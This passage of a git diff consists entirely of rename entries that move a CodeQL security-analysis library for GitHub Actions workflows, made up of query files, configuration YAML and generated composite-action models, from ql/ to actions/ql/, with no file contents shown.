actions/ql/lib/codeql/actions/security/SelfHostedQuery.qll diff --git a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll b/actions/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll similarity index 100% rename from ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll rename to actions/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll diff --git a/ql/lib/codeql/actions/security/UseOfKnownVulnerableActionQuery.qll b/actions/ql/lib/codeql/actions/security/UseOfKnownVulnerableActionQuery.qll similarity index 100% rename from ql/lib/codeql/actions/security/UseOfKnownVulnerableActionQuery.qll rename to actions/ql/lib/codeql/actions/security/UseOfKnownVulnerableActionQuery.qll diff --git a/ql/lib/codeql/actions/security/UseOfUnversionedImmutableAction.qll b/actions/ql/lib/codeql/actions/security/UseOfUnversionedImmutableAction.qll similarity index 100% rename from ql/lib/codeql/actions/security/UseOfUnversionedImmutableAction.qll rename to actions/ql/lib/codeql/actions/security/UseOfUnversionedImmutableAction.qll diff --git a/ql/lib/codeql/files/FileSystem.qll b/actions/ql/lib/codeql/files/FileSystem.qll similarity index 100% rename from ql/lib/codeql/files/FileSystem.qll rename to actions/ql/lib/codeql/files/FileSystem.qll diff --git a/ql/lib/ext/config/argument_injection_sinks.yml b/actions/ql/lib/ext/config/argument_injection_sinks.yml similarity index 100% rename from ql/lib/ext/config/argument_injection_sinks.yml rename to actions/ql/lib/ext/config/argument_injection_sinks.yml diff --git a/ql/lib/ext/config/context_event_map.yml b/actions/ql/lib/ext/config/context_event_map.yml similarity index 100% rename from ql/lib/ext/config/context_event_map.yml rename to actions/ql/lib/ext/config/context_event_map.yml diff --git a/ql/lib/ext/config/externally_triggereable_events.yml b/actions/ql/lib/ext/config/externally_triggereable_events.yml similarity index 100% rename from ql/lib/ext/config/externally_triggereable_events.yml rename to actions/ql/lib/ext/config/externally_triggereable_events.yml diff --git a/ql/lib/ext/config/immutable_actions.yml b/actions/ql/lib/ext/config/immutable_actions.yml similarity index 100% rename from ql/lib/ext/config/immutable_actions.yml rename to actions/ql/lib/ext/config/immutable_actions.yml diff --git a/ql/lib/ext/config/poisonable_steps.yml b/actions/ql/lib/ext/config/poisonable_steps.yml similarity index 100% rename from ql/lib/ext/config/poisonable_steps.yml rename to actions/ql/lib/ext/config/poisonable_steps.yml diff --git a/ql/lib/ext/config/untrusted_event_properties.yml b/actions/ql/lib/ext/config/untrusted_event_properties.yml similarity index 100% rename from ql/lib/ext/config/untrusted_event_properties.yml rename to actions/ql/lib/ext/config/untrusted_event_properties.yml diff --git a/ql/lib/ext/config/untrusted_gh_command.yml b/actions/ql/lib/ext/config/untrusted_gh_command.yml similarity index 100% rename from ql/lib/ext/config/untrusted_gh_command.yml rename to actions/ql/lib/ext/config/untrusted_gh_command.yml diff --git a/ql/lib/ext/config/untrusted_git_command.yml b/actions/ql/lib/ext/config/untrusted_git_command.yml similarity index 100% rename from ql/lib/ext/config/untrusted_git_command.yml rename to actions/ql/lib/ext/config/untrusted_git_command.yml diff --git a/ql/lib/ext/config/vulnerable_actions.yml b/actions/ql/lib/ext/config/vulnerable_actions.yml similarity index 100% rename from ql/lib/ext/config/vulnerable_actions.yml rename to actions/ql/lib/ext/config/vulnerable_actions.yml diff --git a/ql/lib/ext/config/workflow_runtime_data.yml b/actions/ql/lib/ext/config/workflow_runtime_data.yml similarity index 100% rename from ql/lib/ext/config/workflow_runtime_data.yml rename to actions/ql/lib/ext/config/workflow_runtime_data.yml diff --git a/ql/lib/ext/generated/composite-actions/actions_actions-runner-controller.model.yml b/actions/ql/lib/ext/generated/composite-actions/actions_actions-runner-controller.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/actions_actions-runner-controller.model.yml rename to actions/ql/lib/ext/generated/composite-actions/actions_actions-runner-controller.model.yml diff --git a/ql/lib/ext/generated/composite-actions/adap_flower.model.yml b/actions/ql/lib/ext/generated/composite-actions/adap_flower.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/adap_flower.model.yml rename to actions/ql/lib/ext/generated/composite-actions/adap_flower.model.yml diff --git a/ql/lib/ext/generated/composite-actions/agoric_agoric-sdk.model.yml b/actions/ql/lib/ext/generated/composite-actions/agoric_agoric-sdk.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/agoric_agoric-sdk.model.yml rename to actions/ql/lib/ext/generated/composite-actions/agoric_agoric-sdk.model.yml diff --git a/ql/lib/ext/generated/composite-actions/airbnb_lottie-ios.model.yml b/actions/ql/lib/ext/generated/composite-actions/airbnb_lottie-ios.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/airbnb_lottie-ios.model.yml rename to actions/ql/lib/ext/generated/composite-actions/airbnb_lottie-ios.model.yml diff --git a/ql/lib/ext/generated/composite-actions/airbytehq_airbyte.model.yml b/actions/ql/lib/ext/generated/composite-actions/airbytehq_airbyte.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/airbytehq_airbyte.model.yml rename to actions/ql/lib/ext/generated/composite-actions/airbytehq_airbyte.model.yml diff --git a/ql/lib/ext/generated/composite-actions/amazon-ion_ion-java.model.yml b/actions/ql/lib/ext/generated/composite-actions/amazon-ion_ion-java.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/amazon-ion_ion-java.model.yml rename to actions/ql/lib/ext/generated/composite-actions/amazon-ion_ion-java.model.yml diff --git a/ql/lib/ext/generated/composite-actions/anchore_grype.model.yml b/actions/ql/lib/ext/generated/composite-actions/anchore_grype.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/anchore_grype.model.yml rename to actions/ql/lib/ext/generated/composite-actions/anchore_grype.model.yml diff --git a/ql/lib/ext/generated/composite-actions/anchore_syft.model.yml b/actions/ql/lib/ext/generated/composite-actions/anchore_syft.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/anchore_syft.model.yml rename to actions/ql/lib/ext/generated/composite-actions/anchore_syft.model.yml diff --git a/ql/lib/ext/generated/composite-actions/angular_dev-infra.model.yml b/actions/ql/lib/ext/generated/composite-actions/angular_dev-infra.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/angular_dev-infra.model.yml rename to actions/ql/lib/ext/generated/composite-actions/angular_dev-infra.model.yml diff --git a/ql/lib/ext/generated/composite-actions/ansible_ansible-lint.model.yml b/actions/ql/lib/ext/generated/composite-actions/ansible_ansible-lint.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/ansible_ansible-lint.model.yml rename to actions/ql/lib/ext/generated/composite-actions/ansible_ansible-lint.model.yml diff --git a/ql/lib/ext/generated/composite-actions/ansible_awx.model.yml b/actions/ql/lib/ext/generated/composite-actions/ansible_awx.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/ansible_awx.model.yml rename to actions/ql/lib/ext/generated/composite-actions/ansible_awx.model.yml diff --git a/ql/lib/ext/generated/composite-actions/apache_arrow-datafusion.model.yml b/actions/ql/lib/ext/generated/composite-actions/apache_arrow-datafusion.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/apache_arrow-datafusion.model.yml rename to actions/ql/lib/ext/generated/composite-actions/apache_arrow-datafusion.model.yml diff --git a/ql/lib/ext/generated/composite-actions/apache_arrow-rs.model.yml b/actions/ql/lib/ext/generated/composite-actions/apache_arrow-rs.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/apache_arrow-rs.model.yml rename to actions/ql/lib/ext/generated/composite-actions/apache_arrow-rs.model.yml diff --git a/ql/lib/ext/generated/composite-actions/apache_arrow.model.yml b/actions/ql/lib/ext/generated/composite-actions/apache_arrow.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/apache_arrow.model.yml rename to actions/ql/lib/ext/generated/composite-actions/apache_arrow.model.yml diff --git a/ql/lib/ext/generated/composite-actions/apache_bookkeeper.model.yml b/actions/ql/lib/ext/generated/composite-actions/apache_bookkeeper.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/apache_bookkeeper.model.yml rename to actions/ql/lib/ext/generated/composite-actions/apache_bookkeeper.model.yml diff --git a/ql/lib/ext/generated/composite-actions/apache_brpc.model.yml b/actions/ql/lib/ext/generated/composite-actions/apache_brpc.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/apache_brpc.model.yml rename to actions/ql/lib/ext/generated/composite-actions/apache_brpc.model.yml diff --git a/ql/lib/ext/generated/composite-actions/apache_camel-k.model.yml b/actions/ql/lib/ext/generated/composite-actions/apache_camel-k.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/apache_camel-k.model.yml rename to actions/ql/lib/ext/generated/composite-actions/apache_camel-k.model.yml diff --git a/ql/lib/ext/generated/composite-actions/apache_camel.model.yml b/actions/ql/lib/ext/generated/composite-actions/apache_camel.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/apache_camel.model.yml rename to actions/ql/lib/ext/generated/composite-actions/apache_camel.model.yml diff --git a/ql/lib/ext/generated/composite-actions/apache_flink.model.yml b/actions/ql/lib/ext/generated/composite-actions/apache_flink.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/apache_flink.model.yml rename to actions/ql/lib/ext/generated/composite-actions/apache_flink.model.yml diff --git a/ql/lib/ext/generated/composite-actions/apache_incubator-kie-tools.model.yml b/actions/ql/lib/ext/generated/composite-actions/apache_incubator-kie-tools.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/apache_incubator-kie-tools.model.yml rename to actions/ql/lib/ext/generated/composite-actions/apache_incubator-kie-tools.model.yml diff --git a/ql/lib/ext/generated/composite-actions/apache_nuttx.model.yml b/actions/ql/lib/ext/generated/composite-actions/apache_nuttx.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/apache_nuttx.model.yml rename to actions/ql/lib/ext/generated/composite-actions/apache_nuttx.model.yml diff --git a/ql/lib/ext/generated/composite-actions/apache_opendal.model.yml b/actions/ql/lib/ext/generated/composite-actions/apache_opendal.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/apache_opendal.model.yml rename to actions/ql/lib/ext/generated/composite-actions/apache_opendal.model.yml diff --git a/ql/lib/ext/generated/composite-actions/apache_pekko.model.yml b/actions/ql/lib/ext/generated/composite-actions/apache_pekko.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/apache_pekko.model.yml rename to actions/ql/lib/ext/generated/composite-actions/apache_pekko.model.yml diff --git a/ql/lib/ext/generated/composite-actions/apache_pulsar-helm-chart.model.yml b/actions/ql/lib/ext/generated/composite-actions/apache_pulsar-helm-chart.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/apache_pulsar-helm-chart.model.yml rename to actions/ql/lib/ext/generated/composite-actions/apache_pulsar-helm-chart.model.yml diff --git a/ql/lib/ext/generated/composite-actions/apache_superset.model.yml b/actions/ql/lib/ext/generated/composite-actions/apache_superset.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/apache_superset.model.yml rename to actions/ql/lib/ext/generated/composite-actions/apache_superset.model.yml diff --git a/ql/lib/ext/generated/composite-actions/appflowy-io_appflowy.model.yml b/actions/ql/lib/ext/generated/composite-actions/appflowy-io_appflowy.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/appflowy-io_appflowy.model.yml rename to actions/ql/lib/ext/generated/composite-actions/appflowy-io_appflowy.model.yml diff --git a/ql/lib/ext/generated/composite-actions/aptos-labs_aptos-core.model.yml b/actions/ql/lib/ext/generated/composite-actions/aptos-labs_aptos-core.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/aptos-labs_aptos-core.model.yml rename to actions/ql/lib/ext/generated/composite-actions/aptos-labs_aptos-core.model.yml diff --git a/ql/lib/ext/generated/composite-actions/archivesspace_archivesspace.model.yml b/actions/ql/lib/ext/generated/composite-actions/archivesspace_archivesspace.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/archivesspace_archivesspace.model.yml rename to actions/ql/lib/ext/generated/composite-actions/archivesspace_archivesspace.model.yml diff --git a/ql/lib/ext/generated/composite-actions/armadaproject_armada.model.yml b/actions/ql/lib/ext/generated/composite-actions/armadaproject_armada.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/armadaproject_armada.model.yml rename to actions/ql/lib/ext/generated/composite-actions/armadaproject_armada.model.yml diff --git a/ql/lib/ext/generated/composite-actions/armbian_build.model.yml b/actions/ql/lib/ext/generated/composite-actions/armbian_build.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/armbian_build.model.yml rename to actions/ql/lib/ext/generated/composite-actions/armbian_build.model.yml diff --git a/ql/lib/ext/generated/composite-actions/auth0_auth0-java.model.yml b/actions/ql/lib/ext/generated/composite-actions/auth0_auth0-java.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/auth0_auth0-java.model.yml rename to actions/ql/lib/ext/generated/composite-actions/auth0_auth0-java.model.yml diff --git a/ql/lib/ext/generated/composite-actions/auth0_auth0.net.model.yml b/actions/ql/lib/ext/generated/composite-actions/auth0_auth0.net.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/auth0_auth0.net.model.yml rename to actions/ql/lib/ext/generated/composite-actions/auth0_auth0.net.model.yml diff --git a/ql/lib/ext/generated/composite-actions/auth0_auth0.swift.model.yml b/actions/ql/lib/ext/generated/composite-actions/auth0_auth0.swift.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/auth0_auth0.swift.model.yml rename to actions/ql/lib/ext/generated/composite-actions/auth0_auth0.swift.model.yml diff --git a/ql/lib/ext/generated/composite-actions/autogluon_autogluon.model.yml b/actions/ql/lib/ext/generated/composite-actions/autogluon_autogluon.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/autogluon_autogluon.model.yml rename to actions/ql/lib/ext/generated/composite-actions/autogluon_autogluon.model.yml diff --git a/ql/lib/ext/generated/composite-actions/avaiga_taipy.model.yml b/actions/ql/lib/ext/generated/composite-actions/avaiga_taipy.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/avaiga_taipy.model.yml rename to actions/ql/lib/ext/generated/composite-actions/avaiga_taipy.model.yml diff --git a/ql/lib/ext/generated/composite-actions/aws-amplify_amplify-cli.model.yml b/actions/ql/lib/ext/generated/composite-actions/aws-amplify_amplify-cli.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/aws-amplify_amplify-cli.model.yml rename to actions/ql/lib/ext/generated/composite-actions/aws-amplify_amplify-cli.model.yml diff --git a/ql/lib/ext/generated/composite-actions/aws-powertools_powertools-lambda-python.model.yml b/actions/ql/lib/ext/generated/composite-actions/aws-powertools_powertools-lambda-python.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/aws-powertools_powertools-lambda-python.model.yml rename to actions/ql/lib/ext/generated/composite-actions/aws-powertools_powertools-lambda-python.model.yml diff --git a/ql/lib/ext/generated/composite-actions/aws_amazon-vpc-cni-k8s.model.yml b/actions/ql/lib/ext/generated/composite-actions/aws_amazon-vpc-cni-k8s.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/aws_amazon-vpc-cni-k8s.model.yml rename to actions/ql/lib/ext/generated/composite-actions/aws_amazon-vpc-cni-k8s.model.yml diff --git a/ql/lib/ext/generated/composite-actions/aws_karpenter-provider-aws.model.yml b/actions/ql/lib/ext/generated/composite-actions/aws_karpenter-provider-aws.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/aws_karpenter-provider-aws.model.yml rename to actions/ql/lib/ext/generated/composite-actions/aws_karpenter-provider-aws.model.yml diff --git a/ql/lib/ext/generated/composite-actions/awslabs_amazon-eks-ami.model.yml b/actions/ql/lib/ext/generated/composite-actions/awslabs_amazon-eks-ami.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/awslabs_amazon-eks-ami.model.yml rename to actions/ql/lib/ext/generated/composite-actions/awslabs_amazon-eks-ami.model.yml diff --git a/ql/lib/ext/generated/composite-actions/awslabs_aws-lambda-rust-runtime.model.yml b/actions/ql/lib/ext/generated/composite-actions/awslabs_aws-lambda-rust-runtime.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/awslabs_aws-lambda-rust-runtime.model.yml rename to actions/ql/lib/ext/generated/composite-actions/awslabs_aws-lambda-rust-runtime.model.yml diff --git a/ql/lib/ext/generated/composite-actions/azerothcore_azerothcore-wotlk.model.yml b/actions/ql/lib/ext/generated/composite-actions/azerothcore_azerothcore-wotlk.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/azerothcore_azerothcore-wotlk.model.yml rename to actions/ql/lib/ext/generated/composite-actions/azerothcore_azerothcore-wotlk.model.yml diff --git a/ql/lib/ext/generated/composite-actions/azure_azure-datafactory.model.yml b/actions/ql/lib/ext/generated/composite-actions/azure_azure-datafactory.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/azure_azure-datafactory.model.yml rename to actions/ql/lib/ext/generated/composite-actions/azure_azure-datafactory.model.yml diff --git a/ql/lib/ext/generated/composite-actions/badges_shields.model.yml b/actions/ql/lib/ext/generated/composite-actions/badges_shields.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/badges_shields.model.yml rename to actions/ql/lib/ext/generated/composite-actions/badges_shields.model.yml diff --git a/ql/lib/ext/generated/composite-actions/balena-io_etcher.model.yml b/actions/ql/lib/ext/generated/composite-actions/balena-io_etcher.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/balena-io_etcher.model.yml rename to actions/ql/lib/ext/generated/composite-actions/balena-io_etcher.model.yml diff --git a/ql/lib/ext/generated/composite-actions/balena-os_balena-engine.model.yml b/actions/ql/lib/ext/generated/composite-actions/balena-os_balena-engine.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/balena-os_balena-engine.model.yml rename to actions/ql/lib/ext/generated/composite-actions/balena-os_balena-engine.model.yml diff --git a/ql/lib/ext/generated/composite-actions/ben-manes_caffeine.model.yml b/actions/ql/lib/ext/generated/composite-actions/ben-manes_caffeine.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/ben-manes_caffeine.model.yml rename to actions/ql/lib/ext/generated/composite-actions/ben-manes_caffeine.model.yml diff --git a/ql/lib/ext/generated/composite-actions/bokeh_bokeh.model.yml b/actions/ql/lib/ext/generated/composite-actions/bokeh_bokeh.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/bokeh_bokeh.model.yml rename to actions/ql/lib/ext/generated/composite-actions/bokeh_bokeh.model.yml diff --git a/ql/lib/ext/generated/composite-actions/botpress_botpress.model.yml b/actions/ql/lib/ext/generated/composite-actions/botpress_botpress.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/botpress_botpress.model.yml rename to actions/ql/lib/ext/generated/composite-actions/botpress_botpress.model.yml diff --git a/ql/lib/ext/generated/composite-actions/braintree_braintree-android-drop-in.model.yml b/actions/ql/lib/ext/generated/composite-actions/braintree_braintree-android-drop-in.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/braintree_braintree-android-drop-in.model.yml rename to actions/ql/lib/ext/generated/composite-actions/braintree_braintree-android-drop-in.model.yml diff --git a/ql/lib/ext/generated/composite-actions/braintree_braintree_android.model.yml b/actions/ql/lib/ext/generated/composite-actions/braintree_braintree_android.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/braintree_braintree_android.model.yml rename to actions/ql/lib/ext/generated/composite-actions/braintree_braintree_android.model.yml diff --git a/ql/lib/ext/generated/composite-actions/broadinstitute_gatk.model.yml b/actions/ql/lib/ext/generated/composite-actions/broadinstitute_gatk.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/broadinstitute_gatk.model.yml rename to actions/ql/lib/ext/generated/composite-actions/broadinstitute_gatk.model.yml diff --git a/ql/lib/ext/generated/composite-actions/canonical_multipass.model.yml b/actions/ql/lib/ext/generated/composite-actions/canonical_multipass.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/canonical_multipass.model.yml rename to actions/ql/lib/ext/generated/composite-actions/canonical_multipass.model.yml diff --git a/ql/lib/ext/generated/composite-actions/chia-network_actions.model.yml b/actions/ql/lib/ext/generated/composite-actions/chia-network_actions.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/chia-network_actions.model.yml rename to actions/ql/lib/ext/generated/composite-actions/chia-network_actions.model.yml diff --git a/ql/lib/ext/generated/composite-actions/chia-network_chia-blockchain.model.yml b/actions/ql/lib/ext/generated/composite-actions/chia-network_chia-blockchain.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/chia-network_chia-blockchain.model.yml rename to actions/ql/lib/ext/generated/composite-actions/chia-network_chia-blockchain.model.yml diff --git a/ql/lib/ext/generated/composite-actions/chipsalliance_chisel.model.yml b/actions/ql/lib/ext/generated/composite-actions/chipsalliance_chisel.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/chipsalliance_chisel.model.yml rename to actions/ql/lib/ext/generated/composite-actions/chipsalliance_chisel.model.yml diff --git a/ql/lib/ext/generated/composite-actions/chocobozzz_peertube.model.yml b/actions/ql/lib/ext/generated/composite-actions/chocobozzz_peertube.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/chocobozzz_peertube.model.yml rename to actions/ql/lib/ext/generated/composite-actions/chocobozzz_peertube.model.yml diff --git a/ql/lib/ext/generated/composite-actions/cilium_cilium-cli.model.yml b/actions/ql/lib/ext/generated/composite-actions/cilium_cilium-cli.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/cilium_cilium-cli.model.yml rename to actions/ql/lib/ext/generated/composite-actions/cilium_cilium-cli.model.yml diff --git a/ql/lib/ext/generated/composite-actions/cilium_cilium.model.yml b/actions/ql/lib/ext/generated/composite-actions/cilium_cilium.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/cilium_cilium.model.yml rename to actions/ql/lib/ext/generated/composite-actions/cilium_cilium.model.yml diff --git a/ql/lib/ext/generated/composite-actions/citusdata_citus.model.yml b/actions/ql/lib/ext/generated/composite-actions/citusdata_citus.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/citusdata_citus.model.yml rename to actions/ql/lib/ext/generated/composite-actions/citusdata_citus.model.yml diff --git a/ql/lib/ext/generated/composite-actions/clerk_javascript.model.yml b/actions/ql/lib/ext/generated/composite-actions/clerk_javascript.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/clerk_javascript.model.yml rename to actions/ql/lib/ext/generated/composite-actions/clerk_javascript.model.yml diff --git a/ql/lib/ext/generated/composite-actions/cloud-custodian_cloud-custodian.model.yml b/actions/ql/lib/ext/generated/composite-actions/cloud-custodian_cloud-custodian.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/cloud-custodian_cloud-custodian.model.yml rename to actions/ql/lib/ext/generated/composite-actions/cloud-custodian_cloud-custodian.model.yml diff --git a/ql/lib/ext/generated/composite-actions/cloudflare_workers-sdk.model.yml b/actions/ql/lib/ext/generated/composite-actions/cloudflare_workers-sdk.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/cloudflare_workers-sdk.model.yml rename to actions/ql/lib/ext/generated/composite-actions/cloudflare_workers-sdk.model.yml diff --git a/ql/lib/ext/generated/composite-actions/cloudfoundry_cloud_controller_ng.model.yml b/actions/ql/lib/ext/generated/composite-actions/cloudfoundry_cloud_controller_ng.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/cloudfoundry_cloud_controller_ng.model.yml rename to actions/ql/lib/ext/generated/composite-actions/cloudfoundry_cloud_controller_ng.model.yml diff --git a/ql/lib/ext/generated/composite-actions/coder_coder.model.yml b/actions/ql/lib/ext/generated/composite-actions/coder_coder.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/coder_coder.model.yml rename to actions/ql/lib/ext/generated/composite-actions/coder_coder.model.yml diff --git a/ql/lib/ext/generated/composite-actions/coil-kt_coil.model.yml b/actions/ql/lib/ext/generated/composite-actions/coil-kt_coil.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/coil-kt_coil.model.yml rename to actions/ql/lib/ext/generated/composite-actions/coil-kt_coil.model.yml diff --git a/ql/lib/ext/generated/composite-actions/commaai_openpilot.model.yml b/actions/ql/lib/ext/generated/composite-actions/commaai_openpilot.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/commaai_openpilot.model.yml rename to actions/ql/lib/ext/generated/composite-actions/commaai_openpilot.model.yml diff --git a/ql/lib/ext/generated/composite-actions/conan-io_conan-center-index.model.yml b/actions/ql/lib/ext/generated/composite-actions/conan-io_conan-center-index.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/conan-io_conan-center-index.model.yml rename to actions/ql/lib/ext/generated/composite-actions/conan-io_conan-center-index.model.yml diff --git a/ql/lib/ext/generated/composite-actions/corretto_corretto-8.model.yml b/actions/ql/lib/ext/generated/composite-actions/corretto_corretto-8.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/corretto_corretto-8.model.yml rename to actions/ql/lib/ext/generated/composite-actions/corretto_corretto-8.model.yml diff --git a/ql/lib/ext/generated/composite-actions/cosmos_cosmos-sdk.model.yml b/actions/ql/lib/ext/generated/composite-actions/cosmos_cosmos-sdk.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/cosmos_cosmos-sdk.model.yml rename to actions/ql/lib/ext/generated/composite-actions/cosmos_cosmos-sdk.model.yml diff --git a/ql/lib/ext/generated/composite-actions/coturn_coturn.model.yml b/actions/ql/lib/ext/generated/composite-actions/coturn_coturn.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/coturn_coturn.model.yml rename to actions/ql/lib/ext/generated/composite-actions/coturn_coturn.model.yml diff --git a/ql/lib/ext/generated/composite-actions/crunchydata_postgres-operator.model.yml b/actions/ql/lib/ext/generated/composite-actions/crunchydata_postgres-operator.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/crunchydata_postgres-operator.model.yml rename to actions/ql/lib/ext/generated/composite-actions/crunchydata_postgres-operator.model.yml diff --git a/ql/lib/ext/generated/composite-actions/cvc5_cvc5.model.yml b/actions/ql/lib/ext/generated/composite-actions/cvc5_cvc5.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/cvc5_cvc5.model.yml rename to actions/ql/lib/ext/generated/composite-actions/cvc5_cvc5.model.yml diff --git a/ql/lib/ext/generated/composite-actions/d2l-ai_d2l-en.model.yml b/actions/ql/lib/ext/generated/composite-actions/d2l-ai_d2l-en.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/d2l-ai_d2l-en.model.yml rename to actions/ql/lib/ext/generated/composite-actions/d2l-ai_d2l-en.model.yml diff --git a/ql/lib/ext/generated/composite-actions/danysk_build-check-deploy-gradle-action.model.yml b/actions/ql/lib/ext/generated/composite-actions/danysk_build-check-deploy-gradle-action.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/danysk_build-check-deploy-gradle-action.model.yml rename to actions/ql/lib/ext/generated/composite-actions/danysk_build-check-deploy-gradle-action.model.yml diff --git a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-dotnet.model.yml b/actions/ql/lib/ext/generated/composite-actions/datadog_dd-trace-dotnet.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/datadog_dd-trace-dotnet.model.yml rename to actions/ql/lib/ext/generated/composite-actions/datadog_dd-trace-dotnet.model.yml diff --git a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-go.model.yml b/actions/ql/lib/ext/generated/composite-actions/datadog_dd-trace-go.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/datadog_dd-trace-go.model.yml rename to actions/ql/lib/ext/generated/composite-actions/datadog_dd-trace-go.model.yml diff --git a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-js.model.yml b/actions/ql/lib/ext/generated/composite-actions/datadog_dd-trace-js.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/datadog_dd-trace-js.model.yml rename to actions/ql/lib/ext/generated/composite-actions/datadog_dd-trace-js.model.yml diff --git a/ql/lib/ext/generated/composite-actions/datafuselabs_databend.model.yml b/actions/ql/lib/ext/generated/composite-actions/datafuselabs_databend.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/datafuselabs_databend.model.yml rename to actions/ql/lib/ext/generated/composite-actions/datafuselabs_databend.model.yml diff --git a/ql/lib/ext/generated/composite-actions/davatorium_rofi.model.yml b/actions/ql/lib/ext/generated/composite-actions/davatorium_rofi.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/davatorium_rofi.model.yml rename to actions/ql/lib/ext/generated/composite-actions/davatorium_rofi.model.yml diff --git a/ql/lib/ext/generated/composite-actions/debezium_debezium.model.yml b/actions/ql/lib/ext/generated/composite-actions/debezium_debezium.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/debezium_debezium.model.yml rename to actions/ql/lib/ext/generated/composite-actions/debezium_debezium.model.yml diff --git a/ql/lib/ext/generated/composite-actions/defenseunicorns_zarf.model.yml b/actions/ql/lib/ext/generated/composite-actions/defenseunicorns_zarf.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/defenseunicorns_zarf.model.yml rename to actions/ql/lib/ext/generated/composite-actions/defenseunicorns_zarf.model.yml diff --git a/ql/lib/ext/generated/composite-actions/demarches-simplifiees_demarches-simplifiees.fr.model.yml b/actions/ql/lib/ext/generated/composite-actions/demarches-simplifiees_demarches-simplifiees.fr.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/demarches-simplifiees_demarches-simplifiees.fr.model.yml rename to actions/ql/lib/ext/generated/composite-actions/demarches-simplifiees_demarches-simplifiees.fr.model.yml diff --git a/ql/lib/ext/generated/composite-actions/department-of-veterans-affairs_vets-website.model.yml b/actions/ql/lib/ext/generated/composite-actions/department-of-veterans-affairs_vets-website.model.yml 